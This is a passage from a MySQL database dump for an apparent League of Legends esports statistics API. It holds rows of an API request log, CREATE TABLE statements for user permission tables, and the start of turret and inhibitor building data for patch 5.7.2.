',1435081782,'testing',60,'a:0:{}'),(2622,'150.212.3.161',2,'games','gamestats',1435081786,'testing',60,'a:0:{}'),(2623,'150.212.3.161',2,'games','gamestats',1435081790,'testing',60,'a:0:{}'),(2624,'150.212.3.161',2,'games','gamestats',1435081793,'testing',60,'a:0:{}'),(2625,'150.212.3.161',2,'games','gamestats',1435081797,'testing',60,'a:0:{}'),(2626,'150.212.3.161',2,'games','gamestats',1435081801,'testing',60,'a:0:{}'),(2627,'150.212.3.161',2,'games','gamestats',1435081804,'testing',60,'a:0:{}'),(2628,'150.212.3.161',2,'games','gamestats',1435081807,'testing',60,'a:0:{}'),(2629,'150.212.3.161',2,'games','gamestats',1435081810,'testing',60,'a:0:{}'),(2630,'150.212.3.161',2,'games','gamestats',1435081814,'testing',60,'a:0:{}'),(2631,'150.212.3.161',2,'games','gamestats',1435081817,'testing',60,'a:0:{}'),(2632,'150.212.3.161',2,'games','gamestats',1435081821,'testing',60,'a:0:{}'),(2633,'150.212.3.161',2,'games','gamestats',1435081824,'testing',60,'a:0:{}'),(2634,'150.212.3.161',2,'games','gamestats',1435081828,'testing',60,'a:0:{}'),(2635,'150.212.3.161',2,'games','gamestats',1435081832,'testing',60,'a:0:{}'),(2636,'150.212.3.161',2,'games','gamestats',1435081835,'testing',60,'a:0:{}'),(2637,'150.212.3.161',2,'games','gamestats',1435081838,'testing',60,'a:0:{}'),(2638,'150.212.3.161',2,'games','gamestats',1435081842,'testing',60,'a:0:{}'),(2639,'150.212.3.161',2,'games','gamestats',1435081845,'testing',60,'a:0:{}'),(2640,'150.212.3.161',2,'games','gamestats',1435081849,'testing',60,'a:0:{}'),(2641,'150.212.3.161',2,'games','gamestats',1435081853,'testing',60,'a:0:{}'),(2642,'150.212.3.161',2,'games','gamestats',1435081857,'testing',60,'a:0:{}'),(2643,'150.212.3.161',2,'games','gamestats',1435081861,'testing',60,'a:0:{}'),(2644,'150.212.3.161',2,'games','gamestats',1435081865,'testing',60,'a:0:{}'),(2645,'150.212.3.161',2,'games','gamestats',1435081868,'testing',60,'a:0:{}'),(2646,'150.212.3.161',2,'games','gamestats',1435081872,'testing',60,'a:0:{}'),(2647,'150.212.3.161',2,'games','gamestats',1435081876,'testing',60,'a:0:{}'),(2648,'150.212.3.161',2,'games','gamestats',1435081880,'testing',60,'a:0:{}'),(2649,'150.212.3.161',2,'games','gamestats',1435081883,'testing',60,'a:0:{}'),(2650,'150.212.3.161',2,'games','gamestats',1435081887,'testing',60,'a:0:{}'),(2651,'150.212.3.161',2,'games','gamestats',1435081891,'testing',60,'a:0:{}'),(2652,'150.212.3.161',2,'games','gamestats',1435081895,'testing',60,'a:0:{}'),(2653,'150.212.3.161',2,'games','gamestats',1435081898,'testing',60,'a:0:{}'),(2654,'150.212.3.161',2,'games','gamestats',1435081901,'testing',60,'a:0:{}'),(2655,'150.212.3.161',2,'games','gamestats',1435081904,'testing',60,'a:0:{}'),(2656,'150.212.3.161',2,'games','gamestats',1435081908,'testing',60,'a:0:{}'),(2657,'150.212.3.161',2,'games','gamestats',1435081912,'testing',60,'a:0:{}'),(2658,'150.212.3.161',2,'games','gamestats',1435081916,'testing',60,'a:0:{}'),(2659,'150.212.3.161',2,'games','gamestats',1435081920,'testing',60,'a:0:{}'),(2660,'150.212.3.161',2,'games','gamestats',1435081924,'testing',60,'a:0:{}'),(2661,'150.212.3.161',2,'games','gamestats',1435081928,'testing',60,'a:0:{}'),(2662,'150.212.3.161',2,'games','gamestats',1435081932,'testing',60,'a:0:{}'),(2663,'150.212.3.161',2,'games','gamestats',1435081935,'testing',60,'a:0:{}'),(2664,'150.212.3.161',2,'games','gamestats',1435081939,'testing',60,'a:0:{}'),(2665,'150.212.3.161',2,'games','gamestats',1435081943,'testing',60,'a:0:{}'),(2666,'150.212.3.161',2,'games','gamestats',1435081946,'testing',60,'a:0:{}'),(2667,'150.212.3.161',2,'games','gamestats',1435081949,'testing',60,'a:0:{}'),(2668,'150.212.3.161',2,'games','gamestats',1435081952,'testing',60,'a:0:{}'),(2669,'150.212.3.161',2,'games','gamestats',1435081955,'testing',60,'a:0:{}'),(2670,'150.212.3.161',2,'games','gamestats',1435081958,'testing',60,'a:0:{}'),(2671,'150.212.3.161',2,'games','gamestats',1435081962,'testing',60,'a:0:{}'),(2672,'150.212.3.161',2,'games','gamestats',1435081966,'testing',60,'a:0:{}'),(2673,'150.212.3.161',2,'games','gamestats',1435081970,'testing',60,'a:0:{}'),(2674,'150.212.3.161',2,'games','gamestats',1435081974,'testing',60,'a:0:{}'),(2675,'150.212.3.161',2,'games','gamestats',1435081978,'testing',60,'a:0:{}'),(2676,'150.212.3.161',2,'games','gamestats',1435081981,'testing',60,'a:0:{}'),(2677,'150.212.3.161',2,'games','gamestats',1435081984,'testing',60,'a:0:{}'),(2678,'150.212.3.161',2,'games','gamestats',1435081987,'testing',60,'a:0:{}'),(2679,'150.212.3.161',2,'games','gamestats',1435081991,'testing',60,'a:0:{}'),(2680,'150.212.3.161',2,'games','gamestats',1435081995,'testing',60,'a:0:{}'),(2681,'150.212.3.161',2,'games','gamestats',1435081998,'testing',60,'a:0:{}'),(2682,'150.212.3.161',2,'games','gamestats',1435082001,'testing',60,'a:0:{}'),(2683,'150.212.3.161',2,'games','gamestats',1435082005,'testing',60,'a:0:{}'),(2684,'150.212.3.161',2,'games','gamestats',1435082008,'testing',60,'a:0:{}'),(2685,'150.212.3.161',2,'games','gamestats',1435082011,'testing',60,'a:0:{}'),(2686,'150.212.3.161',2,'games','gamestats',1435082014,'testing',60,'a:0:{}'),(2687,'150.212.3.161',2,'games','gamestats',1435082017,'testing',60,'a:0:{}'),(2688,'150.212.3.161',2,'games','gamestats',1435082020,'testing',60,'a:0:{}'),(2689,'150.212.3.161',2,'games','gamestats',1435082024,'testing',60,'a:0:{}'),(2690,'150.212.3.161',2,'games','gamestats',1435082027,'testing',60,'a:0:{}'),(2691,'150.212.3.161',2,'games','gamestats',1435082030,'testing',60,'a:0:{}'),(2692,'150.212.3.161',2,'games','gamestats',1435082034,'testing',60,'a:0:{}'),(2693,'150.212.3.161',2,'games','gamestats',1435082038,'testing',60,'a:0:{}'),(2694,'150.212.3.161',2,'games','gamestats',1435082041,'testing',60,'a:0:{}'),(2695,'150.212.3.161',2,'games','gamestats',1435082044,'testing',60,'a:0:{}'),(2696,'150.212.3.161',2,'games','gamestats',1435082047,'testing',60,'a:0:{}'),(2697,'150.212.3.161',2,'games','gamestats',1435082050,'testing',60,'a:0:{}'),(2698,'150.212.3.161',2,'games','gamestats',1435082053,'testing',60,'a:0:{}'),(2699,'150.212.3.161',2,'games','gamestats',1435082056,'testing',60,'a:0:{}'),(2700,'150.212.3.161',2,'games','gamestats',1435082060,'testing',60,'a:0:{}'),(2701,'150.212.3.161',2,'games','gamestats',1435082063,'testing',60,'a:0:{}'),(2702,'150.212.3.161',2,'games','gamestats',1435082066,'testing',60,'a:0:{}'),(2703,'150.212.3.161',2,'games','gamestats',1435082070,'testing',60,'a:0:{}'),(2704,'150.212.3.161',2,'games','gamestats',1435082074,'testing',60,'a:0:{}'),(2705,'150.212.3.161',2,'games','gamestats',1435082078,'testing',60,'a:0:{}'),(2706,'150.212.3.161',2,'games','gamestats',1435082082,'testing',60,'a:0:{}'),(2707,'150.212.3.161',2,'games','gamestats',1435082086,'testing',60,'a:0:{}'),(2708,'150.212.3.161',2,'games','gamestats',1435082090,'testing',60,'a:0:{}'),(2709,'150.212.3.161',2,'games','gamestats',1435082095,'testing',60,'a:0:{}'),(2710,'150.212.3.161',2,'games','gamestats',1435082098,'testing',60,'a:0:{}'),(2711,'150.212.3.161',2,'games','gamestats',1435082102,'testing',60,'a:0:{}'),(2712,'150.212.3.161',2,'games','gamestats',1435082106,'testing',60,'a:0:{}'),(2713,'150.212.3.161',2,'games','gamestats',1435082109,'testing',60,'a:0:{}'),(2714,'150.212.3.161',2,'games','gamestats',1435082113,'testing',60,'a:0:{}'),(2715,'150.212.3.161',2,'games','gamestats',1435082116,'testing',60,'a:0:{}'),(2716,'150.212.3.161',2,'games','gamestats',1435082120,'testing',60,'a:0:{}'),(2717,'150.212.3.161',2,'games','gamestats',1435082123,'testing',60,'a:0:{}'),(2718,'150.212.3.161',2,'games','gamestats',1435082126,'testing',60,'a:0:{}'),(2719,'150.212.3.161',2,'games','gamestats',1435082129,'testing',60,'a:0:{}'),(2720,'150.212.3.161',2,'games','gamestats',1435082133,'testing',60,'a:0:{}'),(2721,'150.212.3.161',2,'games','gamestats',1435082137,'testing',60,'a:0:{}'),(2722,'150.212.3.161',2,'games','gamestats',1435082141,'testing',60,'a:0:{}'),(2723,'150.212.3.161',2,'games','gamestats',1435082145,'testing',60,'a:0:{}'),(2724,'150.212.3.161',2,'games','gamestats',1435082148,'testing',60,'a:0:{}'),(2725,'150.212.3.161',2,'games','gamestats',1435082151,'testing',60,'a:0:{}'),(2726,'150.212.3.161',2,'games','gamestats',1435082154,'testing',60,'a:0:{}'),(2727,'150.212.3.161',2,'games','gamestats',1435082177,'testing',60,'a:0:{}'),(2728,'150.212.3.161',2,'games','gamestats',1435082177,'testing',60,'a:0:{}'),(2729,'150.212.3.161',2,'games','gamestats',1435082178,'testing',60,'a:0:{}'),(2730,'150.212.3.161',2,'games','gamestats',1435082179,'testing',60,'a:0:{}'),(2731,'150.212.3.161',2,'games','gamestats',1435082179,'testing',60,'a:0:{}'),(2732,'150.212.3.161',2,'games','gamestats',1435082180,'testing',60,'a:0:{}'),(2733,'150.212.3.161',2,'games','gamestats',1435082181,'testing',60,'a:0:{}'),(2734,'150.212.3.161',2,'games','gamestats',1435082184,'testing',60,'a:0:{}'),(2735,'150.212.3.161',2,'games','gamestats',1435082188,'testing',60,'a:0:{}'),(2736,'150.212.3.161',2,'games','gamestats',1435082191,'testing',60,'a:0:{}'),(2737,'150.212.3.161',2,'games','gamestats',1435082195,'testing',60,'a:0:{}'),(2738,'150.212.3.161',2,'games','gamestats',1435082199,'testing',60,'a:0:{}'),(2739,'150.212.3.161',2,'games','gamestats',1435082202,'testing',60,'a:0:{}'),(2740,'150.212.3.161',2,'games','gamestats',1435082205,'testing',60,'a:0:{}'),(2741,'150.212.3.161',2,'games','gamestats',1435082209,'testing',60,'a:0:{}'),(2742,'150.212.3.161',2,'games','gamestats',1435082213,'testing',60,'a:0:{}'),(2743,'150.212.3.161',2,'games','gamestats',1435082217,'testing',60,'a:0:{}'),(2744,'150.212.3.161',2,'games','gamestats',1435082220,'testing',60,'a:0:{}'),(2745,'150.212.3.161',2,'games','gamestats',1435082224,'testing',60,'a:0:{}'),(2746,'150.212.3.161',2,'games','gamestats',1435082228,'testing',60,'a:0:{}'),(2747,'150.212.3.161',2,'games','gamestats',1435082232,'testing',60,'a:0:{}'),(2748,'150.212.3.161',2,'games','gamestats',1435082236,'testing',60,'a:0:{}'),(2749,'150.212.3.161',2,'games','gamestats',1435082240,'testing',60,'a:0:{}'),(2750,'150.212.3.161',2,'games','gamestats',1435082243,'testing',60,'a:0:{}'),(2751,'150.212.3.161',2,'games','gamestats',1435082246,'testing',60,'a:0:{}'),(2752,'150.212.3.161',2,'games','gamestats',1435082249,'testing',60,'a:0:{}'),(2753,'150.212.3.161',2,'games','gamestats',1435082252,'testing',60,'a:0:{}'),(2754,'150.212.3.161',2,'games','gamestats',1435082255,'testing',60,'a:0:{}'),(2755,'150.212.3.161',2,'games','gamestats',1435082258,'testing',60,'a:0:{}'),(2756,'150.212.3.161',2,'games','gamestats',1435082261,'testing',60,'a:0:{}'),(2757,'150.212.3.161',2,'games','gamestats',1435082265,'testing',60,'a:0:{}'),(2758,'150.212.3.161',2,'games','gamestats',1435082269,'testing',60,'a:0:{}'),(2759,'150.212.3.161',2,'games','gamestats',1435082272,'testing',60,'a:0:{}'),(2760,'150.212.3.161',2,'games','gamestats',1435082276,'testing',60,'a:0:{}'),(2761,'150.212.3.161',2,'games','gamestats',1435082279,'testing',60,'a:0:{}'),(2762,'150.212.3.161',2,'games','gamestats',1435082282,'testing',60,'a:0:{}'),(2763,'150.212.3.161',2,'games','gamestats',1435082285,'testing',60,'a:0:{}'),(2764,'150.212.3.161',2,'games','gamestats',1435082289,'testing',60,'a:0:{}'),(2765,'150.212.3.161',2,'games','gamestats',1435082292,'testing',60,'a:0:{}'),(2766,'150.212.3.161',2,'games','gamestats',1435082296,'testing',60,'a:0:{}'),(2767,'150.212.3.161',2,'games','gamestats',1435082300,'testing',60,'a:0:{}'),(2768,'150.212.3.161',2,'games','gamestats',1435082303,'testing',60,'a:0:{}'),(2769,'150.212.3.161',2,'games','gamestats',1435082306,'testing',60,'a:0:{}'),(2770,'150.212.3.161',2,'games','gamestats',1435082309,'testing',60,'a:0:{}'),(2771,'150.212.3.161',2,'games','gamestats',1435082312,'testing',60,'a:0:{}'),(2772,'150.212.3.161',2,'games','gamestats',1435082315,'testing',60,'a:0:{}'),(2773,'150.212.3.161',2,'games','gamestats',1435082319,'testing',60,'a:0:{}'),(2774,'150.212.3.161',2,'games','gamestats',1435082323,'testing',60,'a:0:{}'),(2775,'150.212.3.161',2,'games','gamestats',1435082326,'testing',60,'a:0:{}'),(2776,'150.212.3.161',2,'games','gamestats',1435082330,'testing',60,'a:0:{}'),(2777,'150.212.3.161',2,'games','gamestats',1435082334,'testing',60,'a:0:{}'),(2778,'150.212.3.161',2,'games','gamestats',1435082338,'testing',60,'a:0:{}'),(2779,'150.212.3.161',2,'games','gamestats',1435082341,'testing',60,'a:0:{}'),(2780,'150.212.3.161',2,'games','gamestats',1435082344,'testing',60,'a:0:{}'),(2781,'150.212.3.161',2,'games','gamestats',1435082347,'testing',60,'a:0:{}'),(2782,'150.212.3.161',2,'games','gamestats',1435082350,'testing',60,'a:0:{}'),(2783,'150.212.3.161',2,'games','gamestats',1435082353,'testing',60,'a:0:{}'),(2784,'150.212.3.161',2,'games','gamestats',1435082356,'testing',60,'a:0:{}'),(2785,'150.212.3.161',2,'games','gamestats',1435082360,'testing',60,'a:0:{}'),(2786,'150.212.3.161',2,'games','gamestats',1435082364,'testing',60,'a:0:{}'),(2787,'150.212.3.161',2,'games','gamestats',1435082367,'testing',60,'a:0:{}'),(2788,'150.212.3.161',2,'games','gamestats',1435082371,'testing',60,'a:0:{}'),(2789,'150.212.3.161',2,'games','gamestats',1435082375,'testing',60,'a:0:{}'),(2790,'150.212.3.161',2,'games','gamestats',1435082378,'testing',60,'a:0:{}'),(2791,'150.212.3.161',2,'games','gamestats',1435082381,'testing',60,'a:0:{}'),(2792,'150.212.3.161',2,'games','gamestats',1435082384,'testing',60,'a:0:{}'),(2793,'150.212.3.161',2,'games','gamestats',1435082387,'testing',60,'a:0:{}'),(2794,'150.212.3.161',2,'games','gamestats',1435082391,'testing',60,'a:0:{}'),(2795,'150.212.3.161',2,'games','gamestats',1435082395,'testing',60,'a:0:{}'),(2796,'150.212.3.161',2,'games','gamestats',1435082399,'testing',60,'a:0:{}'),(2797,'150.212.3.161',2,'games','gamestats',1435082403,'testing',60,'a:0:{}'),(2798,'150.212.3.161',2,'games','gamestats',1435082407,'testing',60,'a:0:{}'),(2799,'150.212.3.161',2,'games','gamestats',1435082410,'testing',60,'a:0:{}'),(2800,'150.212.3.161',2,'games','gamestats',1435082413,'testing',60,'a:0:{}'),(2801,'150.212.3.161',2,'games','gamestats',1435082416,'testing',60,'a:0:{}'),(2802,'150.212.3.161',2,'games','gamestats',1435082419,'testing',60,'a:0:{}'),(2803,'150.212.3.161',2,'games','gamestats',1435082422,'testing',60,'a:0:{}'),(2804,'150.212.3.161',2,'games','gamestats',1435082425,'testing',60,'a:0:{}'),(2805,'150.212.3.161',2,'games','gamestats',1435082429,'testing',60,'a:0:{}'),(2806,'150.212.3.161',2,'games','gamestats',1435082433,'testing',60,'a:0:{}'),(2807,'150.212.3.161',2,'games','gamestats',1435082436,'testing',60,'a:0:{}'),(2808,'150.212.3.161',2,'games','gamestats',1435082440,'testing',60,'a:0:{}'),(2809,'150.212.3.161',2,'games','gamestats',1435082443,'testing',60,'a:0:{}'),(2810,'150.212.3.161',2,'games','gamestats',1435082446,'testing',60,'a:0:{}'),(2811,'150.212.3.161',2,'games','gamestats',1435082449,'testing',60,'a:0:{}'),(2812,'150.212.3.161',2,'games','gamestats',1435082452,'testing',60,'a:0:{}'),(2813,'150.212.3.161',2,'games','gamestats',1435082456,'testing',60,'a:0:{}'),(2814,'150.212.3.161',2,'games','gamestats',1435082459,'testing',60,'a:0:{}'),(2815,'150.212.3.161',2,'games','gamestats',1435082462,'testing',60,'a:0:{}'),(2816,'150.212.3.161',2,'games','gamestats',1435082466,'testing',60,'a:0:{}'),(2817,'150.212.3.161',2,'games','gamestats',1435082470,'testing',60,'a:0:{}'),(2818,'150.212.3.161',2,'games','gamestats',1435082473,'testing',60,'a:0:{}'),(2819,'150.212.3.161',2,'games','gamestats',1435082477,'testing',60,'a:0:{}'),(2820,'150.212.3.161',2,'games','gamestats',1435082481,'testing',60,'a:0:{}'),(2821,'150.212.3.161',2,'games','gamestats',1435082485,'testing',60,'a:0:{}'),(2822,'150.212.3.161',2,'games','gamestats',1435082488,'testing',60,'a:0:{}'),(2823,'150.212.3.161',2,'games','gamestats',1435082492,'testing',60,'a:0:{}'),(2824,'150.212.3.161',2,'games','gamestats',1435082496,'testing',60,'a:0:{}'),(2825,'150.212.3.161',2,'games','gamestats',1435082499,'testing',60,'a:0:{}'),(2826,'150.212.3.161',2,'games','gamestats',1435082502,'testing',60,'a:0:{}'),(2827,'150.212.3.161',2,'games','gamestats',1435082505,'testing',60,'a:0:{}'),(2828,'150.212.3.161',2,'games','gamestats',1435082509,'testing',60,'a:0:{}'),(2829,'150.212.3.161',2,'games','gamestats',1435082513,'testing',60,'a:0:{}'),(2830,'150.212.3.161',2,'games','gamestats',1435082517,'testing',60,'a:0:{}'),(2831,'150.212.3.161',2,'games','gamestats',1435082521,'testing',60,'a:0:{}'),(2832,'150.212.3.161',2,'games','gamestats',1435082524,'testing',60,'a:0:{}'),(2833,'150.212.3.161',2,'games','gamestats',1435082527,'testing',60,'a:0:{}'),(2834,'150.212.3.161',2,'games','gamestats',1435082530,'testing',60,'a:0:{}'),(2835,'150.212.3.161',2,'games','gamestats',1435082534,'testing',60,'a:0:{}'),(2836,'150.212.3.161',2,'games','gamestats',1435082538,'testing',60,'a:0:{}'),(2837,'150.212.3.161',2,'games','gamestats',1435082542,'testing',60,'a:0:{}'),(2838,'150.212.3.161',2,'games','gamestats',1435082546,'testing',60,'a:0:{}'),(2839,'150.212.3.161',2,'games','gamestats',1435082549,'testing',60,'a:0:{}'),(2840,'150.212.3.161',2,'games','gamestats',1435082552,'testing',60,'a:0:{}'),(2841,'150.212.3.161',2,'games','gamestats',1435082555,'testing',60,'a:0:{}'),(2842,'150.212.3.161',2,'games','gamestats',1435082558,'testing',60,'a:0:{}'),(2843,'150.212.3.161',2,'games','gamestats',1435082562,'testing',60,'a:0:{}'),(2844,'150.212.3.161',2,'games','gamestats',1435082565,'testing',60,'a:0:{}'),(2845,'150.212.3.161',2,'games','gamestats',1435082569,'testing',60,'a:0:{}'),(2846,'150.212.3.161',2,'games','gamestats',1435082573,'testing',60,'a:0:{}'),(2847,'150.212.3.161',2,'games','gamestats',1435082576,'testing',60,'a:0:{}'),(2848,'150.212.3.161',2,'games','gamestats',1435082579,'testing',60,'a:0:{}'),(2849,'150.212.3.161',2,'games','gamestats',1435082582,'testing',60,'a:0:{}'),(2850,'150.212.3.161',2,'games','gamestats',1435082585,'testing',60,'a:0:{}'),(2851,'150.212.3.161',2,'games','gamestats',1435082588,'testing',60,'a:0:{}'),(2852,'150.212.3.161',2,'games','gamestats',1435082591,'testing',60,'a:0:{}'),(2853,'150.212.3.161',2,'games','gamestats',1435082594,'testing',60,'a:0:{}'),(2854,'150.212.3.161',2,'games','gamestats',1435082598,'testing',60,'a:0:{}'),(2855,'150.212.3.161',2,'games','gamestats',1435082602,'testing',60,'a:0:{}'),(2856,'150.212.3.161',2,'games','gamestats',1435082606,'testing',60,'a:0:{}'),(2857,'150.212.3.161',2,'games','gamestats',1435082610,'testing',60,'a:0:{}'),(2858,'150.212.3.161',2,'games','gamestats',1435082614,'testing',60,'a:0:{}'),(2859,'150.212.3.161',2,'games','gamestats',1435082618,'testing',60,'a:0:{}'),(2860,'150.212.3.161',2,'games','gamestats',1435082621,'testing',60,'a:0:{}'),(2861,'150.212.3.161',2,'games','gamestats',1435082625,'testing',60,'a:0:{}'),(2862,'150.212.3.161',2,'games','gamestats',1435082629,'testing',60,'a:0:{}'),(2863,'150.212.3.161',2,'games','gamestats',1435082633,'testing',60,'a:0:{}'),(2864,'150.212.3.161',2,'games','gamestats',1435082637,'testing',60,'a:0:{}'),(2865,'150.212.3.161',2,'games','gamestats',1435082640,'testing',60,'a:0:{}'),(2866,'150.212.3.161',2,'games','gamestats',1435082644,'testing',60,'a:0:{}'),(2867,'150.212.3.161',2,'games','gamestats',1435082648,'testing',60,'a:0:{}'),(2868,'150.212.3.161',2,'games','gamestats',1435082652,'testing',60,'a:0:{}'),(2869,'150.212.3.161',2,'games','gamestats',1435082656,'testing',60,'a:0:{}'),(2870,'150.212.3.161',2,'games','gamestats',1435082659,'testing',60,'a:0:{}'),(2871,'150.212.3.161',2,'games','gamestats',1435082663,'testing',60,'a:0:{}'),(2872,'150.212.3.161',2,'games','gamestats',1435082667,'testing',60,'a:0:{}'),(2873,'150.212.3.161',2,'games','gamestats',1435082670,'testing',60,'a:0:{}'),(2874,'150.212.3.161',2,'games','gamestats',1435082673,'testing',60,'a:0:{}'),(2875,'150.212.3.161',2,'games','gamestats',1435082677,'testing',60,'a:0:{}'),(2876,'150.212.3.161',2,'games','gamestats',1435082681,'testing',60,'a:0:{}'),(2877,'150.212.3.161',2,'games','gamestats',1435082684,'testing',60,'a:0:{}'),(2878,'150.212.3.161',2,'games','gamestats',1435082687,'testing',60,'a:0:{}'),(2879,'150.212.3.161',2,'games','gamestats',1435082690,'testing',60,'a:0:{}'),(2880,'150.212.3.161',2,'games','gamestats',1435082693,'testing',60,'a:0:{}'),(2881,'150.212.3.161',2,'games','gamestats',1435082696,'testing',60,'a:0:{}'),(2882,'67.207.109.186',1,'players','index',1435102298,'vulcun',-1,'a:0:{}'),(2883,'203.198.53.157',2,'games','gamestats',1435111742,'testing',60,'a:0:{}'),(2884,'203.198.53.157',2,'games','gamestats',1435111745,'testing',60,'a:0:{}'),(2885,'203.198.53.157',2,'games','gamestats',1435111748,'testing',60,'a:0:{}'),(2886,'203.198.53.157',2,'games','gamestats',1435111751,'testing',60,'a:0:{}'),(2887,'173.175.229.177',1,'players','index',1435176039,'javadrop',-1,'a:0:{}'),(2888,'173.175.229.177',1,'games','league_split',1435176220,'javadrop',2,'a:0:{}'),(2889,'74.68.117.164',1,'games','league_split',1435241921,'draftpot',2,'a:0:{}'),(2890,'74.68.117.164',1,'games','league_split',1435241937,'draftpot',3,'a:0:{}'),(2891,'74.68.117.164',2,'games','gamedata',1435241959,'draftpot',77,'a:0:{}'),(2892,'74.68.117.164',1,'players','index',1435241980,'draftpot',-1,'a:0:{}'),(2893,'74.68.117.164',1,'players','index',1435242279,'draftpot',-1,'a:0:{}'),(2894,'84.24.3.137',1,'games','league_split',1435250001,'testing',2,'a:0:{}'),(2895,'84.24.3.137',1,'games','league_split',1435250070,'testing',2,'a:0:{}'),(2896,'84.24.3.137',1,'players','index',1435283394,'testing',-1,'a:0:{}'),(2897,'84.24.3.137',1,'players','esportsplayers',1435283408,'testing',-1,'a:0:{}'),(2898,'84.24.3.137',2,'games','esportsgamedata',1435283434,'testing',60,'a:0:{}'),(2899,'84.24.3.137',2,'games','esportsgamestats',1435283446,'testing',60,'a:0:{}');

--
-- Table structure for table `api_user_game_permission`
--

CREATE TABLE `api_user_game_permission` (
  `api_user_game_permission_id` int(11) NOT NULL AUTO_INCREMENT,
  `api_user_id` int(11) NOT NULL,
  `game_id` int(11) NOT NULL,
  PRIMARY KEY (`api_user_game_permission_id`),
  KEY `api_user_game_permission_api_user_idx` (`api_user_id`),
  KEY `api_user_game_permission_game_id_idx` (`game_id`),
  CONSTRAINT `api_user_game_permission_api_user` FOREIGN KEY (`api_user_id`) REFERENCES `api_user` (`api_user_id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `api_user_game_permission_game_id` FOREIGN KEY (`game_id`) REFERENCES `game` (`game_id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB AUTO_INCREMENT=417 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `api_user_game_permission`
--

INSERT INTO `api_user_game_permission` VALUES (404,6,38),(405,6,39),(406,6,40),(407,6,41),(408,6,43),(409,6,44),(410,6,45),(411,6,26),(412,0,41),(413,0,40),(414,0,39),(415,0,38),(416,0,60);

--
-- Table structure for table `api_user_league_split_permission`
--

CREATE TABLE `api_user_league_split_permission` (
  `api_user_league_split_permission_id` int(11) NOT NULL AUTO_INCREMENT,
  `api_user_id` int(11) NOT NULL,
  `league_split_id` int(11) NOT NULL,
  PRIMARY KEY (`api_user_league_split_permission_id`),
  KEY `api_user_league_split_permission_api_user_idx` (`api_user_id`),
  KEY `api_user_league_split_permission_game_id_idx` (`league_split_id`),
  CONSTRAINT `api_user_league_split_permission_api_user` FOREIGN KEY (`api_user_id`) REFERENCES `api_user` (`api_user_id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `api_user_league_split_permission_game_id` FOREIGN KEY (`league_split_id`) REFERENCES `league_split` (`league_split_id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB AUTO_INCREMENT=45 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `api_user_league_split_permission`
--

INSERT INTO `api_user_league_split_permission` VALUES (26,4,2),(27,4,3),(28,7,2),(29,7,3),(34,6,2),(35,6,3),(36,0,1),(37,0,2),(38,0,3),(39,1,2),(40,1,3),(41,5,2),(42,5,3),(43,2,2),(44,2,3);

--
-- Table structure for table `api_user_tournament_permission`
--

CREATE TABLE `api_user_tournament_permission` (
  `api_user_tournament_permission_id` int(11) NOT NULL AUTO_INCREMENT,
  `api_user_id` int(11) NOT NULL,
  `tournament_id` int(11) NOT NULL,
  PRIMARY KEY (`api_user_tournament_permission_id`),
  KEY `api_user_tournament_permission_api_user_idx` (`api_user_id`),
  KEY `api_user_tournament_permission_tournament_id_idx` (`tournament_id`),
  CONSTRAINT `api_user_tournament_permission_api_user` FOREIGN KEY (`api_user_id`) REFERENCES `api_user` (`api_user_id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `api_user_tournament_permission_tournament_id` FOREIGN KEY (`tournament_id`) REFERENCES `tournament` (`tournament_id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `api_user_tournament_permission`
--


--
-- Table structure for table `building`
--

CREATE TABLE `building` (
  `building_id` int(11) NOT NULL AUTO_INCREMENT,
  `building_type` varchar(45) NOT NULL,
  `lane_type` varchar(45) NOT NULL COMMENT 'building type = Turret, Inhibitor, Nexus\nbuilding placement = red_bot_outer, red_bot_center, red_bot_inner, red_bot_inhib, red_lower_nexus\nred_top_outer... red_mid_outer.... repeat for blue',
  `tower_type` varchar(45) NOT NULL,
  `map_side` varchar(10) NOT NULL,
  `patch_number` varchar(10) NOT NULL,
  `current_patch` tinyint(1) NOT NULL,
  `update_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`building_id`)
) ENGINE=InnoDB AUTO_INCREMENT=27 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `building`
--

INSERT INTO `building` VALUES (1,'TOWER_BUILDING','TOP_LANE','OUTER_TURRET','BLUE','5.7.2',1,'2015-04-21 01:25:36'),(2,'TOWER_BUILDING','TOP_LANE','INNER_TURRET','BLUE','5.7.2',1,'2015-04-21 01:25:36'),(3,'TOWER_BUILDING','TOP_LANE','BASE_TURRET','BLUE','5.7.2',1,'2015-04-21 01:25:36'),(4,'INHIBITOR_BUILDING','TOP_LANE','UNDEFINED_TURRET','BLUE','5.7.2',1,'2015-04-21 01:25:36'),(5,'TOWER_BUILDING','MID_LANE','OUTER_TURRET','BLUE','5.7.2',1,'2015-04-21 01:25:36'),(6,'TOWER_BUILDING','MID_LANE','INNER_TURRET','BLUE','5.7.2',1,'2015-04-21 01:25:36'),(7,'TOWER_BUILDING','MID_LANE','BASE_TURRET','BLUE','5.7.2',1,'2015-04-21 01:25:36'),(8,'INHIBITOR_BUILDING','MID_LANE','UNDEFINED_TURRET','BLUE','5.7.2',1,'2015-04-21 01:25:36'),(9,'TOWER_BUILDING','MID_LANE','NEXUS_TURRET','BLUE','5.7.2',1,'2015-04-21 01:25:36'),(10,'TOWER_BUILDING','BOT_LANE','OUTER_TURRET','BLUE','5.7.2',1,'2015-04-21 01:25:36'),(11,'TOWER_BUILDING','BOT_LANE','INNER_TURRET','BLUE','5.7.2',1,'2015-04-21 01:25:36'),(12,'TOWER_BUILDING','BOT_LANE','BASE_TURRET','BLUE','5.7.2',1,'2015-04-21 01:25:36'),(13,'INHIBITOR_BUILDING','BOT_LANE','UNDEFINED_TURRET','BLUE','5.7.2',1,'2015-04-21 01:25:36'),(14,'TOWER_BUILDING','TOP_LANE','OUTER_TURRET','RED','5.7.2',1,'2015-04-21 01:25:36'),(15,'TOWER_BUILDING','TOP_LANE','INNER_TURRET','RED','5.7.2',1,'2015-04-21 01:25:36'),(16,'TOWER_BUILDING','TOP_LANE','BASE_TURRET','RED','5.7.2',1,'2015-04-21 